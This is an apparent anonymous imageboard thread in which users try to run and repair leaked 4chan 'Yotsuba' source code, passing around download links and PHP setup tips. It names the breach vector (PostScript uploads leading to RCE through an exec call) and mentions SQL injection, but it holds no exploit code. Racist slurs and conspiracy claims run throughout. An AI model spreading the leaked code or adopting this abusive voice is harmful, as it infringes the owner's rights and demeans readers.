โ4613
[Last 50 Posts][1][2][3][4][5][6][7][8][Quote]
>FUCK SOIJAK POSTERSHere we talk about the source code leak of 4chan's proprietary software Yotsuba and try to "fix" it in order to make a proper open-source version of 4chan's (sh!tty) software, for example by fixing bugs such as the colored border on GIF thumbnails and making it work on modern, traditional server setups.
<REDDIT SPACEGet the source code here:
https://files.catbox.moe/d56ws8.7z โ4614[Quote]
>>4613 (OP)hello, i am a techGOD interested in contributing to this o algo
i got the older leak from 2010 working last year (the one where only yotsuba.php was leaked)
โ4615[Quote]
>>4613 (OP)I am not doing the work of 4chan devs for free
โ4616[Quote]
>>4613 (OP)Only reason to use this source code is to find further exploits in it.
It's like finding a house infested with termites that's barely holding on and wanting to 'renovate it' by painting over it.
โ4617[Quote]
>>4613 (OP)The code is so awful you may as well start from scratch. Maybe use Go o algo
โ4618[Quote]
do we have the file(s) related to the index/homepage, or was that left out?
โ4620[Quote]
i will probably be posting a download to my working fix of the older 4chan leak as well later
โ4621[Quote]
I bet the source code has embedded 'p
โ4622[Quote]
I would be more likely to use a 4chan alternative if it were just like 4chan
โ4623[Quote]
I've been combing through the source for about an hour… Good fucking luck getting it running… Its a miracle it worked at all…
โ4626[Quote]
Did moot code this?
โ4627[Quote]
>PHP
>From 12 years ago or more
Just start again at this point
โ4628[Quote]
>>4626most of the main imageboard code was from some random jap in the early 2000s and then forked by moot
โ4629[Quote]
>>4626originally forked from some japanese guy then translated and modified by moot
โ4630[Quote]
>>4626I really hope the git folder gets uploaded. It would be interesting to see exactly who is behind this dumpster fire.
โ4631[Quote]
>>4630tsmt op was a pussy for not leaking EVERYTHING but userdata
โ4632[Quote]
>>4626It was originally written by some jap in 1999 and extended by many people over the years
โ4633[Quote]
>>4630that as well as the "www" folder
โ4634[Quote]
/g/ codeGOD (4cuck refugee) here, i wouldn't mind helping fix this up but it's in really bad condition
โ4635[Quote]
>>4633what is in the www folder that isn't in the leak we have. I was under the impression that the leak we have generated the content that was in the www folder.
โ4636[Quote]
>>46324chan's code itself being a fork of "futallaby"
we probably could look into that for a bit of help with yotsuba
i used futallaby as reference when fixing up the 2010 leak
โ4637[Quote]
>>4635configs, twister_captcha.php
โ4638[Quote]
>>4637as well as presumably the home/news/rules/faq-related pages
โ4639[Quote]
>>4638yea static assets and pages
โ4640[Quote]
>>4639I imagine you could just scrape those from an archive of the site though right?
โ4643[Quote]
honestly i feel like we can ditch a good chunk of the files
a lot of them are things such as static html lists of all the boards and stuff
would be simpler for us to define that once
โ4644[Quote]
>>4642
The fucking credentials are hardcoded?
โ4645[Quote]
>>4642
Woah! Wasn't expecting that. Good fucking job!
โ4646[Quote]
>>4642
can you not use environment variables?
โ4647[Quote]
>source code wont download
over
โ4649[Quote]
should i send my fix of the 2010 leak from last year?
its nothing too big (it's really just yotsuba.php and some config stuff) but it could be a bit helpful
โ4650[Quote]
>>4649If anything I'd be interested to see it.
โ4651[Quote]
>>4649no one cares, redditor
โ4653[Quote]
>>4652
I feel like we're gonna be writing half a new website just getting configs up to the standards of other imageboards, the wordfilters are hardcoded, the db configs are hardcoded, it's so fucking bad
โ4654[Quote]
>>4650https://files.catbox.moe/txpiie.rar (very incomplete but it could be somewhat helpful)
>>4653trvke
โ4655[Quote]
>>4615I hope you guys fix the vulnerabilities and improve it and 4chan actually uses it
โ4656[Quote]
>>4655the jannies hate us so much that they wouldnt use a fix made from here even if it made the site invincible
โ4657[Quote]
https://files.catbox.moe/yypkoa.txtGit log got posted. Looks pretty useless but hopefully the git folder gets posted next.
โ4658[Quote]
>>4656knowing hiro he'd probably use a fix from here and have the jannies claim it's original o algo
โ4659[Quote]
>>4657the spamming will continue until the folder is released
โ4660[Quote]
try and add features from here like polls and multi-image posting
โ4661[Quote]
if the .git folder was released it should contain some good insights about the database schema and allow us to reconstruct the full source as well
โ4662[Quote]
>>4661Considering he posted the gitlog, I wonder why he's holding back the folder. Maybe he's too retarded to zip it up.
โ4663[Quote]
>>4660we could call this fork visuba
โ4664[Quote]
why the fuck are y'all trying to fix this garbage code that originated in the nineties? the only way this site is coming back and not getting instantly pwned again is if they raze the server clean and go to a frontend/backend system that's more modern.
no modern doesn't have to be web 2.0/web 3.0 tons of bullraisin cancer but it has to be software that isn't of atrocious quality to begin with
โ4665[Quote]
we could call it yotsoyba
โ4666[Quote]
>>4665we should have a poll
we need some sort of place to organize everything and post updates doebeit
โ4667[Quote]
>>4666Lets spin up an instance of Yotsuba to talk about developing Yotsuba.
โ4668[Quote]
>>4664I agree, and if that were the goal we would just fork something like JSchan and add more 4cuck features to it
โ4670[Quote]
>>4664>>4668>>4669i should note that despite this code being utter raisin it does appear to be incredibly efficient, so nudevs should take some notes
โ4671[Quote]
>>4667geg
>>4670trvke
theres some slight "good" to this
โ4672[Quote]
>>4670You can't deal with more than a million posts a day if your source code is utter fucking raisin. This src holds a certain value and I hope it's used to improve what we have available (besides JSchan, I hate using this crap).
โ4673[Quote]
>>4669tsmt considering how laggy the sharty is
โ4675[Quote]
>>4613 (OP)Please do it'd be neat
besides helping get 4chan back up I think the many altchans that would inevitably spawn from OpenYotsuba's code would be a great way to decentralize things
โ4676[Quote]
>>4675tsmt, also get vichan upto 4cuck's features standards
โ4678[Quote]
>strip_fake_capcodes
QUOOOOOOOOOOOOOOOOOOOOTE ADD THIS TO THE SHARTY NOOOOOW
โ4679[Quote]
>>4676vichan is so incredibly slow in comparison so the first thing would probably be to figure out how yotsuba is so fast
โ4680[Quote]
>>4674try creating a board out of one thats already hardcoded in several places (e.g. /b/ or any other 4chan board)
>>4675tsmt
โ4681[Quote]
>get_jpeg_dimensions
LMAO WTF? they are parsing the jpeg in postfilter to get the image size manually
โ4682[Quote]
>>4674
gem
i do have a web server but i don't have experience with PHP
โ4683[Quote]
so why IS yotsuba so much faster? how bad can the vichan code really be?
โ4684[Quote]
>22,000 commits
>codebase looks like absolute RAISIN
LOL WHAT
โ4685[Quote]
This shiet is fucking fried I won't even bother. For real.
โ4686[Quote]
>>4683thats the thing
vichan code is very organized compared to the mess that is yotsuba
โ4687[Quote]
You fags say it's raisin but it ran better than any altchan I've come across and made sense to navigate.
Why the fuck does vichan not flip reply hovering. Why does it hyphenate and squish hovering replies against the window.
Why does it feel like I'm reloading a page just to click on a reply.
Why can't altchans integrate the features in 4chanx into its source code.
โ4688[Quote]
>>4686is this proof that bad code is actually le good?
โ4689[Quote]
viruse do not clicke
โ4690[Quote]
>>4688security-wise no
vichan's issue is optimization o algo
โ4691[Quote]
>>4688spaghetti code is usually extremely optimized but suffers in other aspects like readability, maintainability, and security
โ4692[Quote]
>>4690i just realized that the yotsuba code is still proprietary so they can go after altchans if they think that code from this leak got merged into other board software
โ4693[Quote]
>>4692correct me if im wrong but didnt vichan originate from an old proprietary fork of yotsuba? (4chon.net o algo)
โ4694[Quote]
>>4691I don't see a license file, where are you drawing this realization from
โ4695[Quote]
>>4693nevermind it doesn't really matter since the weak hosters run away when the irl children being raped spam happens and the people who don't care about breaking laws just keep re-hosting it on other providers
โ4696[Quote]
>>4694years of experience working with spaghetti code
โ4697[Quote]
>>4696I meant to you the other anon
โ4698[Quote]
>>4613 (OP)>wefuck this site
โ4699[Quote]
i have it generating broken HTML code
โ4700[Quote]
>>4697because having no license means that your code is automatically proprietary. you need to explicitly give permission to it being FOSS
โ4701[Quote]
>litterally 0 major updates to the code since moot put the fries in the bag
KEEEEEEEEEEEEEEK
โ4702[Quote]
>>4701if it ain't broke, don't fix it
โ4703[Quote]
could 4chan just switch to vichan for the backend then? i guess it would have to remove some features?
โ4704[Quote]
>>4703no it would be a laggy mess if 4chans traffic was ran through that
โ4705[Quote]
Might as well use AI to code a whole new imageboard.
โ4707[Quote]
>>4706might just be a leftover code fragment that was commented out instead of deleted in case the coder might need it, then he forgot to remove it later.
But I dont know php anyway, I dont understand why it does all that stuff when nothing is assigned to `ret`, it looks like the function would do nothing and return null every time
โ4708[Quote]
>Updating index…
>Updating index…
>Updating index…
THIS IS NOT A DRILL I GOT IT WORKING
โ4709[Quote]
Best thread on the site
โ4710[Quote]
there are many things i like about vichan and many things i like about 4chan
hopefully once we get vanilla yotsuba running we can make a fusion of the two
โ4711[Quote]
>>4702Problem is it was broke and gookmoot don't know how to fix it.
โ4712[Quote]
yall better have an altchan online running yotsuba when i wake up
โ4713[Quote]
>>4702having vulnerabilities will eventually break it
โ4714[Quote]
>>4713incredible observation
โ4715[Quote]
>>4636I came across this updated version of it, maybe it is helpful to the coders here:
https://github.com/OtakuMegane/FutallabyCodefix โ4716[Quote]
man DCT hashes are tiny, might want to use PDQ ones like here if i want to do anything serious with filtering images
>1 - glasses open_mouth soyjak stubble template variant_classic_soyjak.png
<eb94b04b946bcc87
โ4717[Quote]
Real fucking talk here
Any way to get things decentralized? Heard that word was the hot raisin years prior
โ4718[Quote]
>>4717yes but it would be dead since that kind of stuff usually requires a higher technical skill so it would just be a bunch of schizos and trannies on the network
โ4720[Quote]
>>4703It's literally their only option if they want to comeback online in 15 days.
>>4704Those issues are largely overblown and more a cause of altchans using weak hardware.
โ4722[Quote]
>>4721yes, we cant have nice things because niggers cant stop posting illegal raisin
โ4723[Quote]
You know what we need? sitewide webms/MP4 with SOUND.
โ4724[Quote]
>>4720Yeah an alternate base is needed in order to not get pwned again. I'll take anything tbh, don't care about speed atm
Also I doubt anyone on the current janny team has deep experience with coding. I expect a purge-and-replace. Hopefully the new hotpockets will at least be somewhat competent. People are vastly underestimating the site's soft powers.
โ4725[Quote]
>>4721I've rarely had to wait more than 5 minutes tops, but thats cause my IP is associated with a lot of posts on this site I think. Still better than a fucking 900 SECOND timer for newposters geggg
โ4726[Quote]
>>4720>Those issues are largely overblown and more a cause of altchans using weak hardware.a weak server does not explain my tab freezing when i open a big thread
โ4727[Quote]
>>4725Didn't the leak confirm that it was for phoneposters anyways
โ4728[Quote]
>>4720>more a cause of altchans using weak hardware.Again, not like 4cuck was using a good server. Last updated in 2016 so even if it was the best CPU from 2016 it's still quite underpowered.
โ4729[Quote]
>>4721It's like you ignored the latter half of my sentence, retard.
Nevermind, this project is going to be literal nigger aids since you have the naivety of an actual teenager. I hope you realize that a MPA system prevents retarded bad actors from spamming CP.
โ4730[Quote]
>>4721If you keep posting, jannies recognize the IP and the MPA won't apply to you.
โ4734[Quote]
>>4732>DemoralizedNo, you're just a retard, and I'd rather see someone else work on it.
I can tell you've never been outside of your tranime website if you can't even recognize why giving such a system to smaller altchans would be beneficial in the long run.
โ4735[Quote]
i'm retarded and dont want to spend hours looking at php code i dont understand, how cooked is 4chan? i heard only rapeape and his goons know anything about the backend on the staff
โ4737[Quote]
>>4735its not nearly the deal these titillating trannoids are making it out to be
theyre gonna patch holes and move on, the "exploit" wasnt even a real exploit it was some JIDF shill on the mod team cracked a debug admin roles credentials
โ4738[Quote]
>>4737you're clearly more retarded than me so i assume anything you say is false
โ4739[Quote]
>>4735According to some, the source code is leaked. So the next pwn will be even more devastating if they go back up with the same setup. They still have the database, so it's a matter of migrating.
the unpaid staff will probably get replaced if hiro actually goes to work
โ4740[Quote]
>>4739source code hasnt actually leaked btw
โ4741[Quote]
>>4739i got the source code right here nigga, i know everything is super fucking old and it might be full of exploits, if they have to go over everything and possibly rewrite most of time it's gonna be down for like a month or more since i expect rapeape and his team to be retarded and lazy and not used to actually working
โ4742[Quote]
>>4741I'm guessing the (you) was meant for
>>4740 โ4743[Quote]
>>4741They need to set up a kanban pronto, and unironically hire some anons from this thread. I'd do it for 1BTC
โ4744[Quote]
>>4741"I got the source code bro"
"dude trust me"
that's the same raisin that leaked in the 2010s leak, it looks old because it is old
its psyop crap the fat retarded kike who instigated this whole thing scraped from the wayback machine, there is no 2025 source code leak its the exact same raisin from last time over a decade ago
โ4745[Quote]
>>4743unironically if it is as bad as i think it might be they are probably recruiting /g/ anons to help them for free or at least they should, source is leaked already anyway
โ4746[Quote]
>>4745goddamn you are fucking retarded lol
cant believe i share a board with you subhumans
โ4747[Quote]
Again the "hacker" didnt actually hack into anything, he got into a debug admin role and used that to plumb the team domain to find hiros trip info to post on the chans under hiros trip
It literally just boils down to someone leaving a bad password, there is no access to the source code through the interfaces the "hacker" had access to. Its not even really hacking, just guessing a password.
Embarrassing show
โ4749[Quote]
is JIDF already falseflagging here? so quickly?
โ4752[Quote]
>>4744>that's the same raisin that leaked in the 2010s leak, it looks old because it is oldWhat explains the onions basedjak filters being there? are they that old?
โ4754[Quote]
>>4736You are aware this site will become unusable due to the 'grants
โ4755[Quote]
i will probably need to get admin.php working next since you need admin to regenerate the 'log
โ4756[Quote]
wow the 'grants are making this board unusually fast
โ4757[Quote]
-
โ4758[Quote]
.
โ4763[Quote]
Would anyone have interest in a chan that is less like sharty and more like 4chan EXCEPT keeping the hating and banning pedos but also banning fags and furries and troons, and which innately combats spam and newfaggotry by simply only allowing a certain number of posts per day per IP?
And your amount per day can go up if you make normal posts as you use it longer.
Basically it would be for chuds
โ4764[Quote]
>>4763It's an idea, but I see issues.
That requires saving all the data from every poster. And IP hoppers can avoid that limit. If they can dodge a ban they can dodge a limit. If the limit is anything less than 20 a day than you're just hurting reg users.
โ4765[Quote]
>>4763No, IPs are cheap for the spammers and mods will always be fags.
โ4766[Quote]
>>4721You can apply for a pass once you've posted for a bit. It gts ride of post approval and it's free. You can use a no KYC email (but not disposable.)
โ4767[Quote]
>>4737>the "exploit" wasnt even a real exploit it was some JIDF shill on the mod team cracked a debug admin roles credentialsThat isn't right. The exploit worked by uploading PostScript to the boards that accept PDF, like /sci/, then using that RCE for privilege escalation.
โ4769[Quote]
>>4763>keeping the hating and banning pedos but also banning fags and furries and troonsyou can't have both
โ4864[Quote]
>>4759how? what'd you do? can you upload your fixed up version of the sources (or just the diffs is fine)
โ4871[Quote]
>>4613 (OP)I'm not downloading that raisin nigga + not contributing to 'cuck for free. Upload the repo to a read-only source-hut and I might clone it and poke with it a little, I want to try and dockerize it and run it locally and pentest around
โ4877[Quote]
>>4613 (OP)why does it run on openbsd and php in 2025?
why hasn't gook moot update the codebase ? or at least organize it why?
10 thousand in imageboard.php isn't just lazy. it's crazy.
โ4878[Quote]
>>4871>dockerizegood morning sirs
โ4883[Quote]
>>4670cuz
1. its decades old php code, it doesn't have the bloat other nu-languages inherently bring over i.e. cacascript
2. gook moot spent a fuck ton in servers (the sharty hacker didn't specify which kind of dell poweredges but for the amount of traffic and storage cuckchan needs you can already see how this balloons into much more expensive server racks
https://www.dell.com/en-us/shop/dell-poweredge-servers/sr/enterprise-products/servers โ4884[Quote]
>>4878DO NOT REDEEM THE LOCAL SETUP SAAR
โ4891[Quote]
>>4885is your webserver configured to run php?
also try putting short_open_tag=On in your php.ini
โ4929[Quote]
>>4891short_open_tag is set in /etc/php/5.6/cli/php.ini, and nginx is configured to use php5.6-sock for the subdomain. Dunno if I screwed up the symlinks or whatever. You have a reference I can follow? Preferably in a *nix environment.
โ4938[Quote]
>>4937go advertise somewhere else nigger
โ4944[Quote]
>>4885i am changing all the <?s to <?php so it works on stock PHP 8
โ4947[Quote]
keep up the good work devGODS
โ4955[Quote]
>>4763my ISP changes my IP on like a weekly basis. I don't even need to evade bans.
โ4959[Quote]
Oh great, now I get white screens and no errors.
โ4965[Quote]
>>4959There may still be errors/warnings that you're just not seeing because you probably didn't enable error messages in your php.ini. You can run this to enable that (assuming your path is the same):
f=/etc/php5/apache2/php.ini && sed -i -e 's/display_errors = .*/display_errors = On/' -e 's/display_startup_errors = .*/display_startup_errors = On/' -e 's/error_reporting = .*/error_reporting = E_ALL/' "$f" && service apache2 restart โ4968[Quote]
I wonder how many glowniggers where also posting in 4chan?
I bet /pol/ was 99% feds fedposting to other feds, that bord really was really at contaiment, until they got to /k/ using the ukrain war(no one gives a fuck about ukrainians) and spreed everywhere
โ4971[Quote]
>>4968they already found about 50% of the posts on /pol/ were from israel ips.
it was kiked and glowniggered to raisin, but that was evident for the last decade.
โ4977[Quote]
why does virustotal say there's a backdoor in imageboard.php? HEUR:Backdoor/PHP.WebShell.c or algo
โ4979[Quote]
>>4977is it only one antivirus that detects it? which one
โ4982[Quote]
>>4980in the case of 1 literal who antivirus flagging on virustotal, it
most likely IS a false flag
โ4985[Quote]
>>4979windows 11 blocks it (the entire 7z download), but for a very aggressive reason that's usually a false flag.
it'll block files compiled with csc.exe for the same reason (built-in C# compiler for windows, made by windows, on every windows machine โ C# 'hello world'? determined a trojan)
โ4989[Quote]
>>4975Yeah, here I replaced the short tags recursively, and now I get empty pages with no errors logged in error.log or the page output.
โ4991[Quote]
>>4971Huh. Is that why the post count was removed? Anons were getting wise to what was going on
โ4995[Quote]
>>4989not sure what you mean by replacing short tags, although i'm doing this like an insane retard
i know less than nothing about PHP, i'm using PHP8.2, and apache2's errors when i tried accessing the site after blindly making it accessible were first about curly brace array access syntax, which i fixed manually for some of the source files (make them square braces).
then there were some permissions errors on directories, then some missing global config files (i've created these but left them blank), a missing variable ("$use_pdo"?), and now i'm setting up the database since the only error for now is the "mysql_try_connect" parameters being undefined in lib/db.php
โ5002[Quote]
>>4980It looks like it's just detecting it as having a backdoor when it sees exec used anywhere as removing all of those lines results in no detection. So it's not necessarily backdoored. Though the @exec() there for the PDF thumb conversion seems to be what S0I1337 allegedly used to pawn 4chan.
โ5003[Quote]
>>4995just fyi the old short tags (<? vs the new <php?) don't affect in how php interprets that code. But, if you're trying to run the source code in php8.2 chances are you won't be able to run it at all, because the php version 'cuck runs on is php5.6, and even upgrading one major version is already a pain in the ass and a lot of things not work properly.
โ5005[Quote]
>>4967You're doing good work, lad. Keep us updated on the instructions, I'll catch up tomorrow.
โ5006[Quote]
you might not be able to run it at all*
โ5020[Quote]
>>5003>if you're trying to run the source code in php8.2 chances are you won't be able to run it at allno derp, but that's the exact lazy boomer mindset that caused it to be a trash heap in the first place
right now Claude and i are updating all the mysql query functions, but we were able to get a database connection already
โ5023[Quote]
>sharteens doing more work than 4cacas have in a decade in the span of a few hours
LMAO
โ5036[Quote]
>>5020I meant you won't be able to run it as is without any modifications, the code needs to be updated to reflect on those major version changes
โ5037[Quote]
The codebase of 4chan doesn't seem all that valuable tbh. The concept of an imageboard is simple, and having an extremely complex and bloated system is antithetical to the purpose of what an imageboard should be.
I've been programming my own imageboard that's just a SPA (single-page application). It only has a catalog and threads that are all loaded at the same time. The "database" just uses json files for each thread. It's horribly inefficient but what's great about it is that it's only 850 LOC total so far instead of tens of thousands and it's extremely easy to deploy. And it retains basically all of the most important functions of 4chan.
Simpler imgboards makes it easier for techlets to get into running their own stuff which I think would help the internet overall. It would be less about the technical skill and more about the dedication, art, and culture–which is what made places like soyjak party succeed.
It would be cool if more political creators online ran their own boards. I would love if people like Sam Hyde or Nick Fuentes had their own boards that they ran. Even if only they could create threads and anons could only comment in them it would still be awesome.
/blogpost
โ5042[Quote]
>>5037i know that
(we got it to start reading tables from the database)
>>5037any old codebase is extremely valuable since newer code bases become exponentially more raisinbloated as time goes on
i guarantee anyone who manages to get this thing barely crawling and working will find that it does so using a shockingly low amount of resources (so far, all of my testing on a 1GB cloud midget machine is working fine. you can't even use the rusttranny compiler for a hello world application with that memory)
โ5045[Quote]
why is php faster than javascript?
โ5049[Quote]
>>5042>any old codebase is extremely valuable since newer code bases become exponentially more raisinbloated as time goes on??? This makes zero sense.
Efficiency is important, I'll grant that, but imgboards shouldn't require a lot of resources to run anyways. It's just text and images. I'll try to make my board simpler by having the json database files only loaded when a user clicks on a thread in the catalog. That should be good enough.
โ5058[Quote]
>>5049alright, so put yourself into one of the groups being formed and we'll see how it goes.
so far we have:
1. trying to faithfully recreate the source code with the correct versions (other anons/chuds here)
2. trying to get it online with a modern distro, modern mysql and PHP versions (me)
3. "the codebase of 4chan doesn't seem all that value desu" โ presumably meaning you want to make it from scratch (or would like people to)
โ5059[Quote]
Now that you mention groups, shouldn't we get together to an IRC or something to get the code workin? It's a bit easier to talk that way. Of course, first getting the backend working on 5.6 and then slowly move it over to 8.2
>>5058 โ5062[Quote]
>>5049>makes zero senseHaving the source code for 4chan allows for more accurate and potentially more efficient replication of features you want to copy. It's also good for learning how and how not to do things when making your own imageboard.
>json databaseI've always hated NoSQL. All the projects I've seen using it were horrendously slow and have a super bloated data structure that is difficult to scale. I prefer relational SQL databases like Postgres instead. Just using single json files for each thread like you're talking about can be a really bad idea. Every time a new post is made if the write process is interrupted while overwriting the json file, the updated file will be incomplete and unparsable and any posts it wasn't able to finish writing will be lost. Also, the more posts the thread has, the longer it will take to overwrite the thread json file.
โ5064[Quote]
>>5059i meant a more abstract form of group
i have no idea who is doing what sort of work or how far they've gotten, and i'm as usually (contently) working entirely on my own
if you want to "group up" with others, why not use the exact form of communication we're successfully using right now? (post whatever you have here)
>i will not be first getting the backend working on 5.6, then promptly ripping it apart to get it to 8.2, why wouldn't i just start ripping it apart now? โ5066[Quote]
>>5064this. real-time group chats are a waste of time, literally. people will plan and debate the scope of a project instead of just doing their own thing and contributing… like im doing rn.
โ5080[Quote]
i have the login working
โ5116[Quote]
>PHP 5
LMAO Iโm not touching that trash. Rust or bust.
โ5129[Quote]
>>5095Where's this board
also
>already obsessed irl children being raped spammersdamn 4cucks
โ5135[Quote]
>>5095could you add maybe streaming to it? like streaming movies and tv?
I thought that would be cool one day.
โ5136[Quote]
>>5095To explain further,
I once had this idea if you combined a streaming site but with 4chan and the player in the thread moved to a side window as you scroll. It could be used to watch things with people in real time. along with a global chat with 4chan.
Is that possible or would it blow up the server?
โ5143[Quote]
>>>5049
>alright, so put yourself into one of the groups being formed and we'll see how it goes.
>so far we have:
>1. trying to faithfully recreate the source code with the correct versions (other anons/chuds here)
>2. trying to get it online with a modern distro, modern mysql and PHP versions (me)
>3. "the codebase of 4chan doesn't seem all that value desu" โ presumably meaning you want to make it from scratch (or would like people to)
Really I just think that a different tech stack would be overall better.
Go/Java/whatever backed + JS frontend, special noJS edition for schizos.
JS ate PHP's lunch, evolve or die.
โ5146[Quote]
>>5139If hiro updates the site at a better or close to the alts level, 4chan will come back stronger.
โ5147[Quote]
>>5143>>5139maybe people just want to copy the interface or have hobbyist reasons? don't kill the fun
โ5153[Quote]
>>5139>>5143what seems odd here is that you are perfectly allowed to think or believe these things and work on it or not work on it
and we are allowed to think or believe other things and work on it or not work on it
but if i tell you at least i am working on it
this upsets you, or you seem to want to correct me in what i'm doing
perhaps i do not give a grape, nay, not even a raisin
โ5155[Quote]
>>5147>>5148>>5153Don't lump me in with
>>5139I don't care if people want to recreate yotsuba in modern PHP.
โ5173[Quote]
>>5146Hiro will never in a million years use 4chan software with outside contributions. We're talking about the guy who couldn't be bothered to apply security updates.
>>5153There are tons of IB projects needing contributions to advance the state of the art and you autists are dicking around with dead software. It's like "retrocomputing", you're allowed to like it and I'm allowed to call you retarded.
โ5175[Quote]
>>51394chan doesn't crash when i open a big thread
sharty crashes when i open a big thread
according to this scientific study verified by snopes, 4chan is BETTER
โ5178[Quote]
>>5175werks on my machine
โ5181[Quote]
new 4chan should use distributed tech
ipfs storage
gundb bavkend
โ5187[Quote]
just my 2c
yeah modern 4chan sucked, esp the moderation, content, etc
but no one ever complained about the actual tech it used
you can build it as solidly as you want
but how tf are we going to get people to come
โ5191[Quote]
>>5187I ain't gonna lie, this whole venture might only result in spawning an opensource 4chan without the userbase (not actually that fruitless when you think about it).
A lot of the users are already solidifying and regrouping in 8chan. In due time, 4chan will go back online too.
โ5193[Quote]
>>>5187 (You)
Bro not ONE opensource 4chan, more like a dozen with 3 users each.
The thing is I don't want to go back to 4chan either.
Have you seen the leak? It confirms its more or less controlled opposition.
โ5196[Quote]
>>5191>A lot of the users are already solidifying and regrouping in 8chanAnd yet I'm here like a retard (before you ask, no I'm not contributing I just find it all fascinating)
โ5198[Quote]
It needs rewriting from the scratch or to use an in-box imageboard engine (like the sharty), the base is too much raisin no wonder it got hacked. There's literally echo '<html>' in functions in the middle of SQL queries, ever heard of MVC, nigger ?
โ5214[Quote]
>>5198>rewriting from the scratchgood morning saar
โ5216[Quote]
>all of the code for every april fools is mangled into the main image board code
hahahaha fuck me
โ5217[Quote]
>>5198literally no need, all we need to do is fix the security vulnerabilities and make it less spaghetti (carefully, to avoid deoptimizing it)
โ5219[Quote]
yes let's rewrite 4chan
let me know once you get it working: hiro@4chan.org
โ5220[Quote]
>>5217theoretically if i understand what happened, one can just get it online, disable uploading PDFs, and
<walla!>>5219i'm going to charge that slant-eyed nigger more than he can afford if he wants me to contribute to his blacked tranny spam nightmare
โ5221[Quote]
here's my crap guide to make it work with php5.3 under ubuntu:
https://0bin.org/paste/akvFgG1L#YxkJ4mQQR-4j9qHFpsmamrH7nC/e+mFIcE6EhonCtj5included apache2 conf files too, probably still need some other fixes i forgot to add though
replace /etc/php/5.6/apache2/php.ini with /usr/lib/php/5.6/php.ini-development to get it to show error messages, and change short_open_tag=On in there too
โ5225[Quote]
>>5220there are other bugs in the code like naive sqli
โ5226[Quote]
>>5221also forgot to mention, add
function fastcgi_finish_request() {}
near top of imgboard.php too, that's some FPM func for nginx
seems to work fine with apache after that
โ5227[Quote]
>>5221>>5226neat, i'll rewrite into nginx if i ever feel like it
โ5250[Quote]
Thank god I'm not the only one who is trying to make the mess that is Yotsuba half decent again.
โ5259[Quote]
>>4613 (OP)Would be cool to integrate DeepSeek as a moderator. Fully anonymous with no bias moderation.
Have it detect illegal raisin and ban that IP
โ5260[Quote]
>>4763Train DeepSeek to replace moderators. A fully autonomous image board
โ5269[Quote]
>>5262oh wow, hiromoot was still developing on old code?
โ5298[Quote]
>>5262Something like that was tried here and it failed miserably and got pulled after 20 minutes
โ5300[Quote]
>>5259you would see thousands of false positives, just like on reddit. absolute garbage
โ5305[Quote]
>>5298All you need to moderate are the uploaded images/files.
Were they trying to check posts as well?
>>5300Isn't it the reason for training the model?
โ5311[Quote]
>>5305i don't know but i think ai sucks ass at this and it's destroying the normie part of the internet
โ5317[Quote]
>>5314
thanks for the spam retard
โ5321[Quote]
>>5221got it working in an arch linux vm, godspeed
i think i understand how it's so efficient; it just regenerates static html files of each thread and serves them instead of dynamically generating the html for each request
โ5324[Quote]
>>5321Furthermore, the static board serving server (boards.) and the main imageboard action API (sys.) are completely separate physical machines connected through a shared NFS mount point, which drastically decreases the load on the database and php scripts used in general
โ5325[Quote]
>>5324For some boards, instead of rebuilding the threads HTMLs on every new post, a special daemon called rebuildd is used (most likely executed via a crontab job) that checks for dirty (expired) built pages and rebuilds just them (as well as the catalog and such of course)
โ5326[Quote]
>>5262All tensorchan is, is sending a POST to a REST API on danbo.int (some random digitalocean server, seems public) for a prediction on it being NSFW. Unless there's something obvious I'm missing it is enabled for all SFW boards, so every single image post queries this site, and clearly it doesn't do a very good job.
>>5229First release should be on git like gitgud.io
โ5327[Quote]
>>5325They also use Cloudflare CDN caching for static serving and generated pages
โ5331[Quote]
>>5326danbo.int is a server in their intranet as shown in the hosts file s0i1337 posted on kiwifarms
โ5336[Quote]
>>5331That's gay because 4chan's ability to somehow stop irl children being raped spam is the only really valuable thing in this raisinheap
โ5339[Quote]
>>5336well I have bad news then as the tensorboard raisin seems to be off in the leak anyway, I feel like Cloudflare does most of cp spam prevention (they have a system that checks files you serve against NCMEC hashes), as well as 4chan's own file hash blacklist they have in their database
โ5341[Quote]
>>5339uhh guys.. this code legally doesn't belong to you. so you can stop now.
โ5342[Quote]
>>5341i meant that to everyone
โ5343[Quote]
>>5341well ain't that a bitch
โ5345[Quote]
>>5341your mother legally does belong to me, thoughbeit
โ5347[Quote]
>>5346you wouldn't download your mother
โ5351[Quote]
>>5324>>5321nice! reverse engineering 4chan to see how it ticks, would there be a way of making those run in separate tasks? hell, even a cross platform (ie run an instance on windows) "port"?
โ5352[Quote]
So what's the deal with the root row in the board table being a timestamp?
โ5353[Quote]
>>5351why would you ever run some website on fucking windows
โ5360[Quote]
>>4613 (OP)>twf want to help>Only proficient in C or C++I knew I had to learn webdev some days…
โ5361[Quote]
File: yomi.jpg ๐ฅ๏ธ (285.05 KB, 600x800) aa902d9117a39e97c70cf62706fc51827cb50f86daa5ea1dab92f45d554a08ee0ImgOps

>>5360Same, I know PHP but I'm crap at it. Not confident enough I won't do anything stupid to warrant hosting websites of my own for extended periods of time.
โ5365[Quote]
>>5353Dunno about him, but I planned to backport to PHP 5.2 and IIS 3.P, which can run on winNT 4.0. I already did it for Futaba.
In other news, I got picrel at least. Sadly imgboard.php complains of a nonexistent board when I tried to make a custom one, even though it's already in the db as a table. /g/ spawned fine, although opening a thread results in "Bad Request".
โ5367[Quote]
>>5365>Sadly imgboard.php complains of a nonexistent board when I tried to make a custom oneLooking briefly an imgboard.php, I see there's a variable like this: valid_boards = "3|aco|adv|an|biz|diy|fa|fit|gd|gif|int|lit|hc|hr|a|b|ck|co|cm|c|d|e|f|g|h|i|k|lgbt|m|n|o|out|p|r|s|t|u|vp|vg|vr|v|w|x|y|wg|ic|cgl|hm|mlp|mu|pol|po|r9k|s4s|sci|soc|tg|tv|toy|trv|jp|sp|wsg|qa|qst|his|trash|news|wsr|vip|bant|vrpg|vmg|vst|vt|vm|pw|xs";
Maybe you need to manually add it there as well?
โ5368[Quote]
>>5352I think root is used to store when the post was last bumped so the board can create index pages.
Here's a bit of code from Angeleno's Futaba/Futallaby fork.
https://github.com/RealAngeleno/futaba-eki/blob/master/imgboard.php โ5372[Quote]
File: dvr.png ๐ฅ๏ธ (62.52 KB, 847x2816) bf9ef5ced18ccff1de7eff07ffe179c1b07e078300c5807f180f0013200708070ImgOps

>>5353ease of use, i know its not the most stable or reliable thing in the world because my hacked-up CCTV dvr runs windows
โ5376[Quote]
>>5367Not quite, there's another piece of the puzzle: the board needs to have a valid config ini. Go to sys/config/boards, copy an existing config and name it after your custom board, edit the properties, and run the generator again. That's how I managed to create mine.
